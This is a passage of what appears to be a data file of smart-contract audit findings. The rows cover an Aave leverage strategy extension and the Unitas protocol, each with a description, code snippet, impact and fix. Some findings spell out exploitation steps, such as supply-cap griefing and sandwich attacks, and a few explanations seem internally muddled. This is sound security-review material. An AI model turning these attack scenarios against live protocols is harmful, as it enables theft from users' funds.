The result is that if the `borrowValue` ever exceeds `liquidationThreshold * (1 - unutilizedLeveragPercentage)` then all attempts to repay will revert.\\nAaveLeverageStrategyExtension.sol#L1110-L1118\\n```\\n } else {\\n uint256 netRepayLimit = _actionInfo.collateralValue\\n .preciseMul(liquidationThresholdRaw.mul(10 ** 14))\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(execution.unutilizedLeveragePercentage));\\n\\n return _actionInfo.collateralBalance\\n .preciseMul(netRepayLimit.sub(_actionInfo.borrowValue))\\n .preciseDiv(netRepayLimit);\\n }\\n```\\n\\nWhen calculating `netRepayLimit`, `_calculateMaxBorrowCollateral` uses the `liquidationThreshold` adjusted by `unutilizedLeveragePercentage`. It then subtracts the borrow value from this limit. This is problematic because if the current `borrowValue` of the set token exceeds `liquidationThreshold` * (1 - unutilizedLeveragPercentage) then this line will revert making it impossible to make any kind of repayment. Once no repayment is possible the set token can't rebalance and will be liquidated.",Don't adjust the max value by `unutilizedLeveragPercentage`,Once the leverage exceeds a certain point the set token can no longer rebalance,```\\n } else {\\n uint256 netRepayLimit = _actionInfo.collateralValue\\n .preciseMul(liquidationThresholdRaw.mul(10 ** 14))\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(execution.unutilizedLeveragePercentage));\\n\\n return _actionInfo.collateralBalance\\n .preciseMul(netRepayLimit.sub(_actionInfo.borrowValue))\\n .preciseDiv(netRepayLimit);\\n }\\n```\\n +setIncentiveSettings would be halt during a rebalance operation that gets stuck due to supply cap is reached at Aave,medium,"setIncentiveSettings would be halt during a rebalance operation that gets stuck due to supply cap is reached at Aave\\nrebalance implement a cap of tradeSize and if the need to rebalance require taking more assets than the maxTradeSize, then `twapLeverageRatio` would be set to the targeted leverage. 
`twapLeverageRatio` == 0 is required during rebalance.\\nConsider:\\nlever is needed during rebalance, the strategy require to borrow more ETH and sell to wstETH during the 1st call of rebalance the protocol cache the new `twapLeverageRatio` However wstETH market in Aave reach supply cap. rebalance/iterateRebalance comes to a halt. `twapLeverageRatio` remains caching the targeted leverage\\nsetIncentiveSettings requires a condition in which no rebalance is in progress. With the above case, setIncentiveSettings can be halted for an extended period of time until the wstETH market falls under supply cap.\\nWorth-noting, at the time of writing this issue, the wstETH market at Aave has been at supply cap\\nIn this case, malicious actor who already has a position in wstETH can do the following:\\ndeposit into the setToken, trigger a rebalance.\\nmalicious trader withdraw his/her position in Aave wstETH market so there opens up vacancy for supply again.\\nprotocol owner see supply vacancy, call rebalance in order to lever as required. Now twapLeverageRatio is set to new value since multiple trades are needed\\nmalicious trader now re-supply the wstETH market at Aave so it reaches supply cap again.\\nthe protocol gets stuck with a non-zero twapLeverageRatio, `setIncentiveSettings` can not be called.\\n```\\n function setIncentiveSettings(IncentiveSettings memory _newIncentiveSettings) external onlyOperator noRebalanceInProgress {\\n incentive = _newIncentiveSettings;\\n\\n _validateNonExchangeSettings(methodology, execution, incentive);\\n\\n emit IncentiveSettingsUpdated(\\n incentive.etherReward,\\n incentive.incentivizedLeverageRatio,\\n incentive.incentivizedSlippageTolerance,\\n incentive.incentivizedTwapCooldownPeriod\\n );\\n }\\n```\\n","Add some checks on whether the supply cap of an Aave market is reached during a rebalance. 
If so, allow a re-set of twapLeverageRatio",setIncentiveSettings would be halted.,"```\n function setIncentiveSettings(IncentiveSettings memory _newIncentiveSettings) external onlyOperator noRebalanceInProgress {\n incentive = _newIncentiveSettings;\n\n _validateNonExchangeSettings(methodology, execution, incentive);\n\n emit IncentiveSettingsUpdated(\n incentive.etherReward,\n incentive.incentivizedLeverageRatio,\n incentive.incentivizedSlippageTolerance,\n incentive.incentivizedTwapCooldownPeriod\n );\n }\n```\n" +Protocol doesn't completely protect itself from `LTV = 0` tokens,medium,"The AaveLeverageStrategyExtension does not completely protect against tokens with a Loan-to-Value (LTV) of 0. Tokens with an LTV of 0 in Aave V3 pose significant risks, as they cannot be used as collateral to borrow upon a breaking withdrawal. Moreover, LTVs of assets could be set to 0, even though they currently aren't, which could create substantial problems with potential disruption of multiple functionalities. This bug could cause a Denial-of-Service (DoS) situation in some cases, and has the potential to impact the borrowing logic in the protocol, leading to an unintentionally large perceived borrowing limit.\nWhen an AToken has LTV = 0, Aave restricts the usage of certain operations. 
Specifically, if a user owns at least one AToken as collateral with an LTV = 0, certain operations could revert:\\nWithdraw: If the asset being withdrawn is collateral and the user is borrowing something, the operation will revert if the withdrawn collateral is an AToken with LTV > 0.\\nTransfer: If the asset being transferred is an AToken with LTV > 0 and the sender is using the asset as collateral and is borrowing something, the operation will revert.\\nSet the reserve of an AToken as non-collateral: If the AToken being set as non-collateral is an AToken with LTV > 0, the operation will revert.\\nTake a look at AaveLeverageStrategyExtension.sol#L1050-L1119\\n```\\n /**\\n * Calculate total notional rebalance quantity and chunked rebalance quantity in collateral units.\\n *\\n * return uint256 Chunked rebalance notional in collateral units\\n * return uint256 Total rebalance notional in collateral units\\n */\\n function _calculateChunkRebalanceNotional(\\n LeverageInfo memory _leverageInfo,\\n uint256 _newLeverageRatio,\\n bool _isLever\\n )\\n internal\\n view\\n returns (uint256, uint256)\\n {\\n // Calculate absolute value of difference between new and current leverage ratio\\n uint256 leverageRatioDifference = _isLever ? _newLeverageRatio.sub(_leverageInfo.currentLeverageRatio) : _leverageInfo.currentLeverageRatio.sub(_newLeverageRatio);\\n\\n uint256 totalRebalanceNotional = leverageRatioDifference.preciseDiv(_leverageInfo.currentLeverageRatio).preciseMul(_leverageInfo.action.collateralBalance);\\n\\n uint256 maxBorrow = _calculateMaxBorrowCollateral(_leverageInfo.action, _isLever);\\n\\n uint256 chunkRebalanceNotional = Math.min(Math.min(maxBorrow, totalRebalanceNotional), _leverageInfo.twapMaxTradeSize);\\n\\n return (chunkRebalanceNotional, totalRebalanceNotional);\\n }\\n\\n /**\\n * Calculate the max borrow / repay amount allowed in base units for lever / delever. 
This is due to overcollateralization requirements on\\n * assets deposited in lending protocols for borrowing.\\n *\\n * For lever, max borrow is calculated as:\\n * (Net borrow limit in USD - existing borrow value in USD) / collateral asset price adjusted for decimals\\n *\\n * For delever, max repay is calculated as:\\n * Collateral balance in base units * (net borrow limit in USD - existing borrow value in USD) / net borrow limit in USD\\n *\\n * Net borrow limit for levering is calculated as:\\n * The collateral value in USD * Aave collateral factor * (1 - unutilized leverage %)\\n *\\n * Net repay limit for delevering is calculated as:\\n * The collateral value in USD * Aave liquiditon threshold * (1 - unutilized leverage %)\\n *\\n * return uint256 Max borrow notional denominated in collateral asset\\n */\\n function _calculateMaxBorrowCollateral(ActionInfo memory _actionInfo, bool _isLever) internal view returns(uint256) {\\n\\n // Retrieve collateral factor and liquidation threshold for the collateral asset in precise units (1e16 = 1%)\\n ( , uint256 maxLtvRaw, uint256 liquidationThresholdRaw, , , , , , ,) = strategy.aaveProtocolDataProvider.getReserveConfigurationData(address(strategy.collateralAsset));\\n\\n // Normalize LTV and liquidation threshold to precise units. 
LTV is measured in 4 decimals in Aave which is why we must multiply by 1e14\\n // for example ETH has an LTV value of 8000 which represents 80%\\n if (_isLever) {\\n uint256 netBorrowLimit = _actionInfo.collateralValue\\n .preciseMul(maxLtvRaw.mul(10 ** 14))\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(execution.unutilizedLeveragePercentage));\\n\\n return netBorrowLimit\\n .sub(_actionInfo.borrowValue)\\n .preciseDiv(_actionInfo.collateralPrice);\\n } else {\\n uint256 netRepayLimit = _actionInfo.collateralValue\\n .preciseMul(liquidationThresholdRaw.mul(10 ** 14))\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(execution.unutilizedLeveragePercentage));\\n\\n return _actionInfo.collateralBalance\\n .preciseMul(netRepayLimit.sub(_actionInfo.borrowValue))\\n .preciseDiv(netRepayLimit);\\n }\\n }\\n```\\n\\nApart from the aforementioned issue with `LTV = 0` tokens, there's another issue with the `_calculateMaxBorrowCollateral()` function. When `LTV = 0`, `maxLtvRaw` also equals 0, leading to a `netBorrowLimit` of 0. When the borrowing value is subtracted from this, it results in an underflow, causing the borrowing limit to appear incredibly large. This essentially breaks the borrowing logic of the protocol.",The protocol should consider implementing additional protections against tokens with an LTV of 0.,"This bug could potentially disrupt the entire borrowing logic within the protocol by inflating the perceived borrowing limit. This could lead to users borrowing an unlimited amount of assets due to the underflow error. 
In extreme cases, this could lead to a potential loss of user funds or even a complete protocol shutdown, thus impacting user trust and the overall functionality of the protocol.","```\\n /**\\n * Calculate total notional rebalance quantity and chunked rebalance quantity in collateral units.\\n *\\n * return uint256 Chunked rebalance notional in collateral units\\n * return uint256 Total rebalance notional in collateral units\\n */\\n function _calculateChunkRebalanceNotional(\\n LeverageInfo memory _leverageInfo,\\n uint256 _newLeverageRatio,\\n bool _isLever\\n )\\n internal\\n view\\n returns (uint256, uint256)\\n {\\n // Calculate absolute value of difference between new and current leverage ratio\\n uint256 leverageRatioDifference = _isLever ? _newLeverageRatio.sub(_leverageInfo.currentLeverageRatio) : _leverageInfo.currentLeverageRatio.sub(_newLeverageRatio);\\n\\n uint256 totalRebalanceNotional = leverageRatioDifference.preciseDiv(_leverageInfo.currentLeverageRatio).preciseMul(_leverageInfo.action.collateralBalance);\\n\\n uint256 maxBorrow = _calculateMaxBorrowCollateral(_leverageInfo.action, _isLever);\\n\\n uint256 chunkRebalanceNotional = Math.min(Math.min(maxBorrow, totalRebalanceNotional), _leverageInfo.twapMaxTradeSize);\\n\\n return (chunkRebalanceNotional, totalRebalanceNotional);\\n }\\n\\n /**\\n * Calculate the max borrow / repay amount allowed in base units for lever / delever. 
This is due to overcollateralization requirements on\\n * assets deposited in lending protocols for borrowing.\\n *\\n * For lever, max borrow is calculated as:\\n * (Net borrow limit in USD - existing borrow value in USD) / collateral asset price adjusted for decimals\\n *\\n * For delever, max repay is calculated as:\\n * Collateral balance in base units * (net borrow limit in USD - existing borrow value in USD) / net borrow limit in USD\\n *\\n * Net borrow limit for levering is calculated as:\\n * The collateral value in USD * Aave collateral factor * (1 - unutilized leverage %)\\n *\\n * Net repay limit for delevering is calculated as:\\n * The collateral value in USD * Aave liquiditon threshold * (1 - unutilized leverage %)\\n *\\n * return uint256 Max borrow notional denominated in collateral asset\\n */\\n function _calculateMaxBorrowCollateral(ActionInfo memory _actionInfo, bool _isLever) internal view returns(uint256) {\\n\\n // Retrieve collateral factor and liquidation threshold for the collateral asset in precise units (1e16 = 1%)\\n ( , uint256 maxLtvRaw, uint256 liquidationThresholdRaw, , , , , , ,) = strategy.aaveProtocolDataProvider.getReserveConfigurationData(address(strategy.collateralAsset));\\n\\n // Normalize LTV and liquidation threshold to precise units. 
LTV is measured in 4 decimals in Aave which is why we must multiply by 1e14\\n // for example ETH has an LTV value of 8000 which represents 80%\\n if (_isLever) {\\n uint256 netBorrowLimit = _actionInfo.collateralValue\\n .preciseMul(maxLtvRaw.mul(10 ** 14))\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(execution.unutilizedLeveragePercentage));\\n\\n return netBorrowLimit\\n .sub(_actionInfo.borrowValue)\\n .preciseDiv(_actionInfo.collateralPrice);\\n } else {\\n uint256 netRepayLimit = _actionInfo.collateralValue\\n .preciseMul(liquidationThresholdRaw.mul(10 ** 14))\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(execution.unutilizedLeveragePercentage));\\n\\n return _actionInfo.collateralBalance\\n .preciseMul(netRepayLimit.sub(_actionInfo.borrowValue))\\n .preciseDiv(netRepayLimit);\\n }\\n }\\n```\\n" +no validation to ensure the arbitrum sequencer is down,medium,There is no validation to ensure sequencer is down\\n```\\n int256 rawCollateralPrice = strategy.collateralPriceOracle.latestAnswer();\\n rebalanceInfo.collateralPrice = rawCollateralPrice.toUint256().mul(10 ** strategy.collateralDecimalAdjustment);\\n int256 rawBorrowPrice = strategy.borrowPriceOracle.latestAnswer();\\n rebalanceInfo.borrowPrice = rawBorrowPrice.toUint256().mul(10 ** strategy.borrowDecimalAdjustment);\\n```\\n\\nUsing Chainlink in L2 chains such as Arbitrum requires to check if the sequencer is down to avoid prices from looking like they are fresh although they are not.\\nThe bug could be leveraged by malicious actors to take advantage of the sequencer downtime.,recommend to add checks to ensure the sequencer is not down.,"when sequencer is down, stale price is used for oracle and the borrow value and collateral value is calculated and the protocol can be forced to rebalance in a loss position",```\\n int256 rawCollateralPrice = strategy.collateralPriceOracle.latestAnswer();\\n rebalanceInfo.collateralPrice = rawCollateralPrice.toUint256().mul(10 ** 
strategy.collateralDecimalAdjustment);\\n int256 rawBorrowPrice = strategy.borrowPriceOracle.latestAnswer();\\n rebalanceInfo.borrowPrice = rawBorrowPrice.toUint256().mul(10 ** strategy.borrowDecimalAdjustment);\\n```\\n +Relying solely on oracle base slippage parameters can cause significant loss due to sandwich attacks,medium,"AaveLeverageStrategyExtension relies solely on oracle price data when determining the slippage parameter during a rebalance. This is problematic as chainlink oracles, especially mainnet, have upwards of 2% threshold before triggering a price update. If swapping between volatile assets, the errors will compound causing even bigger variation. These variations can be exploited via sandwich attacks.\\nAaveLeverageStrategyExtension.sol#L1147-L1152\\n```\\nfunction _calculateMinRepayUnits(uint256 _collateralRebalanceUnits, uint256 _slippageTolerance, ActionInfo memory _actionInfo) internal pure returns (uint256) {\\n return _collateralRebalanceUnits\\n .preciseMul(_actionInfo.collateralPrice)\\n .preciseDiv(_actionInfo.borrowPrice)\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(_slippageTolerance));\\n}\\n```\\n\\nWhen determining the minimum return from the swap, _calculateMinRepayUnits directly uses oracle data to determine the final output. The differences between the true value and the oracle value can be systematically exploited via sandwich attacks. Given the leverage nature of the module, these losses can cause significant loss to the pool.","The solution to this is straight forward. Allow keepers to specify their own slippage value. Instead of using an oracle slippage parameter, validate that the specified slippage value is within a margin of the oracle. This gives the best of both world. 
It allows for tighter and more reactive slippage controls while still preventing outright abuse in the event that the trusted keeper is compromised.",Purely oracle derived slippage parameters will lead to significant and unnecessary losses,"```\nfunction _calculateMinRepayUnits(uint256 _collateralRebalanceUnits, uint256 _slippageTolerance, ActionInfo memory _actionInfo) internal pure returns (uint256) {\n return _collateralRebalanceUnits\n .preciseMul(_actionInfo.collateralPrice)\n .preciseDiv(_actionInfo.borrowPrice)\n .preciseMul(PreciseUnitMath.preciseUnit().sub(_slippageTolerance));\n}\n```\n" +"Chainlink price feed is `deprecated`, not sufficiently validated and can return `stale` prices.",medium,"The function `_createActionInfo()` uses Chainlink's deprecated latestAnswer function; this function also does not guarantee that the price returned by the Chainlink price feed is not stale, and there are no additional checks to ensure that the return values are valid.\nThe internal function `_createActionInfo()` calls `strategy.collateralPriceOracle.latestAnswer()` and `strategy.borrowPriceOracle.latestAnswer()`, which use Chainlink's deprecated latestAnswer() to get the latest price. However, there is no check for whether the returned value is stale data.\n```\nfunction _createActionInfo() internal view returns(ActionInfo memory) {\n ActionInfo memory rebalanceInfo;\n\n // Calculate prices from chainlink. 
Chainlink returns prices with 8 decimal places, but we need 36 - underlyingDecimals decimal places.\\n // This is so that when the underlying amount is multiplied by the received price, the collateral valuation is normalized to 36 decimals.\\n // To perform this adjustment, we multiply by 10^(36 - 8 - underlyingDecimals)\\n int256 rawCollateralPrice = strategy.collateralPriceOracle.latestAnswer();\\n rebalanceInfo.collateralPrice = rawCollateralPrice.toUint256().mul(10 ** strategy.collateralDecimalAdjustment);\\n int256 rawBorrowPrice = strategy.borrowPriceOracle.latestAnswer();\\n rebalanceInfo.borrowPrice = rawBorrowPrice.toUint256().mul(10 ** strategy.borrowDecimalAdjustment);\\n// More Code// rest of code.\\n}\\n \\n```\\n","The `latestRoundData` function should be used instead of the deprecated `latestAnswer` function and add sufficient checks to ensure that the pricefeed is not stale.\\n```\\n(uint80 roundId, int256 assetChainlinkPriceInt, , uint256 updatedAt, uint80 answeredInRound) = IPrice(_chainlinkFeed).latestRoundData();\\n require(answeredInRound >= roundId, ""price is stale"");\\n require(updatedAt > 0, ""round is incomplete"");\\n```\\n","The function `_createActionInfo()` is used to return important values used throughout the contract, the staleness of the chainlinklink return values will lead to wrong calculation of the collateral and borrow prices and other unexpected behavior.","```\\nfunction _createActionInfo() internal view returns(ActionInfo memory) {\\n ActionInfo memory rebalanceInfo;\\n\\n // Calculate prices from chainlink. 
Chainlink returns prices with 8 decimal places, but we need 36 - underlyingDecimals decimal places.\\n // This is so that when the underlying amount is multiplied by the received price, the collateral valuation is normalized to 36 decimals.\\n // To perform this adjustment, we multiply by 10^(36 - 8 - underlyingDecimals)\\n int256 rawCollateralPrice = strategy.collateralPriceOracle.latestAnswer();\\n rebalanceInfo.collateralPrice = rawCollateralPrice.toUint256().mul(10 ** strategy.collateralDecimalAdjustment);\\n int256 rawBorrowPrice = strategy.borrowPriceOracle.latestAnswer();\\n rebalanceInfo.borrowPrice = rawBorrowPrice.toUint256().mul(10 ** strategy.borrowDecimalAdjustment);\\n// More Code// rest of code.\\n}\\n \\n```\\n" +The protocol does not compatible with token such as USDT because of the Approval Face Protection,medium,"The protocol does not compatible with token such as USDT because of the Approval Face Protection\\nthe protocol is intended to interact with any ERC20 token and USDT is a common one\\nQ: Which ERC20 tokens do you expect will interact with the smart contracts? 
The protocol expects to interact with any ERC20.\\nIndividual SetToken's should only interact with ERC20 chosen by the SetToken manager.\\nwhen doing the deleverage\\nfirst, we construct the deleverInfo\\n```\\nActionInfo memory deleverInfo = _createAndValidateActionInfo(\\n _setToken,\\n _collateralAsset,\\n _repayAsset,\\n _redeemQuantityUnits,\\n _minRepayQuantityUnits,\\n _tradeAdapterName,\\n false\\n );\\n```\\n\\nthen we withdraw from the lending pool, execute trade and repay the borrow token\\n```\\n_withdraw(deleverInfo.setToken, deleverInfo.lendingPool, _collateralAsset, deleverInfo.notionalSendQuantity);\\n\\n uint256 postTradeReceiveQuantity = _executeTrade(deleverInfo, _collateralAsset, _repayAsset, _tradeData);\\n\\n uint256 protocolFee = _accrueProtocolFee(_setToken, _repayAsset, postTradeReceiveQuantity);\\n\\n uint256 repayQuantity = postTradeReceiveQuantity.sub(protocolFee);\\n\\n _repayBorrow(deleverInfo.setToken, deleverInfo.lendingPool, _repayAsset, repayQuantity);\\n```\\n\\nthis is calling _repayBorrow\\n```\\n/**\\n * @dev Invoke repay from SetToken using AaveV2 library. Burns DebtTokens for SetToken.\\n */\\nfunction _repayBorrow(ISetToken _setToken, ILendingPool _lendingPool, IERC20 _asset, uint256 _notionalQuantity) internal {\\n _setToken.invokeApprove(address(_asset), address(_lendingPool), _notionalQuantity);\\n _setToken.invokeRepay(_lendingPool, address(_asset), _notionalQuantity, BORROW_RATE_MODE);\\n}\\n```\\n\\nthe trade received (quantity - the protocol fee) is used to repay the debt\\nbut the required debt to be required is the (borrowed amount + the interest rate)\\nsuppose the only debt that needs to be repayed is 1000 USDT\\ntrade received (quantity - the protocol) fee is 20000 USDT\\nonly 1000 USDT is used to repay the debt\\nbecause when repaying, the paybackAmount is only the debt amount\\n```\\nuint256 paybackAmount = params.interestRateMode == DataTypes.InterestRateMode.STABLE\\n ? 
stableDebt\\n : variableDebt;\\n```\\n\\nthen when burning the variable debt token\\n```\\nreserveCache.nextScaledVariableDebt = IVariableDebtToken(\\n reserveCache.variableDebtTokenAddress\\n ).burn(params.onBehalfOf, paybackAmount, reserveCache.nextVariableBorrowIndex);\\n```\\n\\nonly the ""payback amount"", which is 1000 USDT is transferred to pay the debt,\\nthe excessive leftover amount is (20000 USDT - 1000 USDT) = 19000 USDT\\nbut if we lookback into the repayBack function\\n```\\n/**\\n * @dev Invoke repay from SetToken using AaveV2 library. Burns DebtTokens for SetToken.\\n */\\nfunction _repayBorrow(ISetToken _setToken, ILendingPool _lendingPool, IERC20 _asset, uint256 _notionalQuantity) internal {\\n _setToken.invokeApprove(address(_asset), address(_lendingPool), _notionalQuantity);\\n _setToken.invokeRepay(_lendingPool, address(_asset), _notionalQuantity, BORROW_RATE_MODE);\\n}\\n```\\n\\nthe approved amount is 20000 USDT, but only 1000 USDT approval limit is used, we have 19000 USDT approval limit left\\naccording to\\nSome tokens (e.g. OpenZeppelin) will revert if trying to approve the zero address to spend tokens (i.e. 
a call to approve(address(0), amt)).\\nIntegrators may need to add special cases to handle this logic if working with such a token.\\nUSDT is such token that subject to approval race condition, without approving 0 first, the second approve after first repay will revert",Approval 0 first,second and following repay borrow will revert if the ERC20 token is subject to approval race condition,"```\\nActionInfo memory deleverInfo = _createAndValidateActionInfo(\\n _setToken,\\n _collateralAsset,\\n _repayAsset,\\n _redeemQuantityUnits,\\n _minRepayQuantityUnits,\\n _tradeAdapterName,\\n false\\n );\\n```\\n" +Operator is blocked when sequencer is down on Arbitrum,medium,When the sequencer is down on Arbitrum state changes can still happen on L2 by passing them from L1 through the Delayed Inbox.\\nUsers can still interact with the Index protocol but due to how Arbitrum address aliasing functions the operator will be blocked from calling onlyOperator().\\nThe `msg.sender` of a transaction from the Delayed Inbox is aliased:\\n```\\nL2_Alias = L1_Contract_Address + 0x1111000000000000000000000000000000001111\\n```\\n\\nAll functions with the `onlyOperator()` modifier are therefore blocked when the sequencer is down.\\nThe issue exists for all modifiers that are only callable by specific EOAs. But the operator of the Aave3LeverageStrategyExtension is the main security risk.,Change the `onlyOperator()` to check if the address is the aliased address of the operator.,The operator has roles that are vital for the safety of the protocol. Re-balancing and issuing/redeeming can still be done when the sequencer is down it is therefore important that the operator call the necessary functions to operate the protocol when the sequencer is down.\\n`disengage()` is an important safety function that the operator should always have access especially when the protocol is still in accessible to other users. 
Changing methodology and adding/removing exchanges are also important for the safety of the protocol.,```\\nL2_Alias = L1_Contract_Address + 0x1111000000000000000000000000000000001111\\n```\\n +Oracle Price miss matched when E-mode uses single oracle,medium,"AAVE3 can turn on single oracle use on any E-mode category. When that is done collateral and the borrowed assets will be valued based on a single oracle price. When this is done the prices used in AaveLeverageStrategyExtension can differ from those used internally in AAVE3.\\nThis can lead to an increased risk of liquidation and failures to re-balance properly.\\nThere is currently no accounting for single oracle use in the AaveLeverageStragyExtension, if AAVE3 turns it on the extension will simply continue using its current oracles without accounting for the different prices.\\nWhen re-balancing the following code calculate the netBorrowLimit/netRepayLimit:\\n```\\n if (_isLever) {\\n uint256 netBorrowLimit = _actionInfo.collateralValue\\n .preciseMul(maxLtvRaw.mul(10 ** 14))\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(execution.unutilizedLeveragePercentage));\\n\\n return netBorrowLimit\\n .sub(_actionInfo.borrowValue)\\n .preciseDiv(_actionInfo.collateralPrice);\\n } else {\\n uint256 netRepayLimit = _actionInfo.collateralValue\\n .preciseMul(liquidationThresholdRaw.mul(10 ** 14))\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(execution.unutilizedLeveragePercentage));\\n\\n return _actionInfo.collateralBalance\\n .preciseMul(netRepayLimit.sub(_actionInfo.borrowValue)) \\n .preciseDiv(netRepayLimit);\\n \\n```\\n\\nThe `_actionInfo.collateralValue` and `_adminInfo.borrowValue` are `_getAndValidateLeverageInfo()` where they are both retrieved based on the current set chainlink oracle.\\nWhen E-mode uses a single oracle price a de-pegging of one of the assets will lead to incorrect values of `netBorrowLimit` and `netRepayLimit` depending on which asset is de-pegging.\\n`collateralValue` or `borrowValue` 
can be either larger or smaller than how they are valued internally in AAVE3.",Aave3LeverageStrategyExtension should take single oracle usage into account. `_calcualteMaxBorrowCollateral` should check if there is a discrepancy and adjust such that the `execute.unutilizedLeveragePercentage` safety parameter is honored.,"When Levering\\nIf `collateralValue` is to valued higher than internally in AAVE3 OR If `borrowValue` is to valued lower than internally in AAVE3:\\nThe `netBorrowLimit` is larger than it should be we are essentially going to overriding `execute.unutilizedLeveragePercentage` and attempting to borrow more than we should.\\nIf `collateralValue` is valued lower than internally in AAVE3 OR If `borrowValue` is to valued higher than internally in AAVE3:\\nThe `netBorrowLimit` is smaller than it should be, we are not borrowing as much as we should. Levering up takes longer.\\nWhen Delevering\\nIf `collateralValue` is to valued higher than internally in AAVE3 OR If `borrowValue` is to valued lower than internally in AAVE3:\\nWe will withdraw more collateral and repay more than specified by `execution.unutilizedLeveragePercentage`.\\nIf `collateralValue` is valued lower than internally in AAVE3 OR If `borrowValue` is to valued higher than internally in AAVE3:\\nWe withdraw less and repay less debt than we should. This means that both `ripcord()` and `disengage()` are not functioning as they, they will not delever as fast they should. We can look at it as `execution.unutilizedLeveragePercentage` not being throttled.\\nThe above consequences show that important functionality is not working as expected. 
""overriding"" `execution.unutilizedLeveragePercentage` is a serious safety concern.",```\\n if (_isLever) {\\n uint256 netBorrowLimit = _actionInfo.collateralValue\\n .preciseMul(maxLtvRaw.mul(10 ** 14))\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(execution.unutilizedLeveragePercentage));\\n\\n return netBorrowLimit\\n .sub(_actionInfo.borrowValue)\\n .preciseDiv(_actionInfo.collateralPrice);\\n } else {\\n uint256 netRepayLimit = _actionInfo.collateralValue\\n .preciseMul(liquidationThresholdRaw.mul(10 ** 14))\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(execution.unutilizedLeveragePercentage));\\n\\n return _actionInfo.collateralBalance\\n .preciseMul(netRepayLimit.sub(_actionInfo.borrowValue)) \\n .preciseDiv(netRepayLimit);\\n \\n```\\n +"In case the portfolio makes a loss, the total reserves and reserve ratio will be inflated.",medium,"The pool balance is transferred to the portfolio for investment, for example sending USDT to Curve/Aave/Balancer etc. to generate yield. However, there are risks associated with those protocols such as smart contract risks. In case a loss happens, it will not be reflected in the pool balance and the total reserve and reserve ratio will be inflated.\\nThe assets in the pool can be sent to the portfolio account to invest and earn yield. The amount of assets in the insurance pool and Unitas pool is tracked by the `_balance` variable. This amount is used to calculate the total reserve and total collateral, which then are used to calculate the reserve ratio.\\n```\\n uint256 tokenReserve = _getBalance(token);\\n uint256 tokenCollateral = IInsurancePool(insurancePool).getCollateral(token);\\n```\\n\\nWhen there is a loss to the portfolio, there is no way to write down the `_balance` variable. This leads to an overstatement of the total reserve and reserve ratio.","Add function to allow admin to write off the `_balance` in case of investment lost. 
Example:\\n```\\nfunction writeOff(address token, uint256 amount) external onlyGuardian {\\n\\n uint256 currentBalance = IERC20(token).balanceOf(address(this));\\n\\n // Require that the amount to write off is less than or equal to the current balance\\n require(amount <= currentBalance, ""Amount exceeds balance"");\\n _balance[token] -= amount;\\n\\n emit WriteOff(token, amount);\\n}\\n```\\n",Overstatement of the total reserve and reserve ratio can increase the risk for the protocol because of undercollateralization of assets.,```\\n uint256 tokenReserve = _getBalance(token);\\n uint256 tokenCollateral = IInsurancePool(insurancePool).getCollateral(token);\\n```\\n +USD1 is priced as $1 instead of being pegged to USDT,medium,"The system treats 1 USD1 = $1 instead of 1 USD1 = 1 USDT which allows arbitrage opportunities.\\nTo swap from one token to another Unitas first get's the price of the quote token and then calculates the swap result. Given that we want to swap 1 USD1 for USDT, we have USDT as the quote token:\\n```\\n address priceQuoteToken = _getPriceQuoteToken(tokenIn, tokenOut);\\n price = oracle.getLatestPrice(priceQuoteToken);\\n _checkPrice(priceQuoteToken, price);\\n\\n feeNumerator = isBuy ? pair.buyFee : pair.sellFee;\\n feeToken = IERC20Token(priceQuoteToken == tokenIn ? 
tokenOut : tokenIn);\\n\\n SwapRequest memory request;\\n request.tokenIn = tokenIn;\\n request.tokenOut = tokenOut;\\n request.amountType = amountType;\\n request.amount = amount;\\n request.feeNumerator = feeNumerator;\\n request.feeBase = tokenManager.SWAP_FEE_BASE();\\n request.feeToken = address(feeToken);\\n request.price = price;\\n request.priceBase = 10 ** oracle.decimals();\\n request.quoteToken = priceQuoteToken;\\n\\n (amountIn, amountOut, fee) = _calculateSwapResult(request);\\n```\\n\\nSince `amountType == AmountType.In`, it executes _calculateSwapResultByAmountIn():\\n```\\n // When tokenOut is feeToken, subtracts the fee after converting the amount\\n amountOut = _convert(\\n request.tokenIn,\\n request.tokenOut,\\n amountIn,\\n MathUpgradeable.Rounding.Down,\\n request.price,\\n request.priceBase,\\n request.quoteToken\\n );\\n fee = _getFeeByAmountWithFee(amountOut, request.feeNumerator, request.feeBase);\\n amountOut -= fee;\\n```\\n\\nGiven that the price is 0.99e18, i.e. 1 USDT is worth $0.99, it calculates the amount of USDT we should receive as:\\n```\\n function _convertByFromPrice(\\n address fromToken,\\n address toToken,\\n uint256 fromAmount,\\n MathUpgradeable.Rounding rounding,\\n uint256 price,\\n uint256 priceBase\\n ) internal view virtual returns (uint256) {\\n uint256 fromBase = 10 ** IERC20Metadata(fromToken).decimals();\\n uint256 toBase = 10 ** IERC20Metadata(toToken).decimals();\\n\\n return fromAmount.mulDiv(price * toBase, priceBase * fromBase, rounding);\\n }\\n```\\n\\nGiven that:\\ntoBase = 10**6 = 1e6 (USDT has 6 decimals)\\nfromBase = 10**18 = 1e18 (USD1 has 18 decimals)\\npriceBase = 1e18\\nprice = 0.99e18 (1 USDT = $0.99)\\nfromAmount = 1e18 (we swap 1 USD1) we get: $1e18 * 0.99e18 * 1e6 / (1e18 * 1e18) = 0.99e6$\\nSo by redeeming 1 USD1 I only get back 0.99 USDT. 
